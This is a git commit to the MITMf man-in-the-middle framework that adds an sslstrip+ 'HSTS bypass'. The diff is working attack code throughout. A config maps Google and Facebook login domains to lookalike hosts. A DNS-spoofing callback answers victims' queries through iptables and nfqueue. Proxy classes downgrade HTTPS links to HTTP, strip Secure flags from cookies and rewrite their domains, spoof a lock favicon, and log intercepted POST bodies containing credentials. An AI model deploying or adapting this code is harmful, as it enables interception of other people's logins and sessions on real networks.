added HSTS bypass as demonstrated by Leonardo Nve at blackhat

This commit is contained in:
byt3bl33d3r 2014-10-11 13:09:06 +02:00
parent 5be41cfd37
commit 82739bba9f
11 changed files with 765 additions and 18 deletions

View file

@ -0,0 +1,7 @@
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
www.facebook.com = social.facebook.com
accounts.google.se = cuentas.google.se

View file

@ -3,8 +3,6 @@
from twisted.web import http
from twisted.internet import reactor
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner
from sslstrip.ProxyPlugins import ProxyPlugins
@ -15,7 +13,7 @@ import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
mitmf_version = "0.6"
mitmf_version = "0.7"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
@ -34,6 +32,7 @@ if __name__ == "__main__":
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", help="Enable HSTS bypass")
#Initialize plugins
plugins = []
@ -69,7 +68,7 @@ if __name__ == "__main__":
load = []
try:
for p in plugins:
if getattr(args,p.optname):
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
except NotImplementedError:
@ -78,8 +77,28 @@ if __name__ == "__main__":
#Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
reactor.run()
elif args.hsts:
from sslstrip.StrippingProxyHSTS import StrippingProxy
from sslstrip.URLMonitorHSTS import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
else:
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)

View file

@ -6,6 +6,7 @@ from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin
from time import sleep
import dns.resolver
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
@ -45,6 +46,8 @@ class Spoof(Plugin):
self.target = options.target
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
@ -91,12 +94,17 @@ class Spoof(Plugin):
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
if self.dns:
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.hstscfg = ConfigObj(self.hstscfg)
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
self.start_dns_queue()
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
@ -225,26 +233,52 @@ class Spoof(Plugin):
return pkt
def resolve_domain(self, domain):
try:
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips[0]
except Exception:
logging.debug("Error resolving " + domain)
def nfqueue_callback(self, i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if self.dnscfg:
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNS].qd.qname:
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
elif self.domain in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, self.dnsip)
elif self.hsts:
if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
def modify_dns(self, payload, pkt, ip):
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
def modify_dns(self, payload, pkt, ip, hsts=False):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
if hsts:
logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
else:
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self):

View file

@ -57,9 +57,9 @@ class ClientRequest(Request):
headers['accept-encoding'] == 'identity'
logging.debug("Zapped encoding")
if 'Strict-Transport-Security' in headers: #kill new hsts requests
del headers['Strict-Transport-Security']
logging.info("Zapped a HSTS request")
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'if-modified-since' in headers:
del headers['if-modified-since']

View file

@ -0,0 +1,203 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnectionHSTS import ServerConnection
from SSLServerConnectionHSTS import SSLServerConnection
from URLMonitorHSTS import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we dont like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
self.content.seek(0, 0)
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

11
sslstrip/README.sslstrip+ Normal file
View file

@ -0,0 +1,11 @@
SSLStrip+
=========
This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism.
This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information.
For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48

View file

@ -0,0 +1,121 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnectionHSTS import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@ -23,6 +23,7 @@ from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
@ -105,6 +106,7 @@ class ServerConnection(HTTPClient):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):

View file

@ -0,0 +1,214 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitorHSTS import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host']))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@ -0,0 +1,29 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequestHSTS import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

107
sslstrip/URLMonitorHSTS.py Normal file
View file

@ -0,0 +1,107 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config_files/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)